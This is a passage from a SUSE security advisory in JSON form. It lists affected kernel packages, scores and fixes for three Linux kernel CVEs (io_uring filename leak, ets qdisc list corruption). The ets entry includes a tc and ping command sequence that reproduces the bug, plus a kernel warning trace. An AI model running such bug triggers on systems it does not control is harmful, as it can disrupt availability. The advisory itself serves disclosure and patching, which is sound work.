"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? 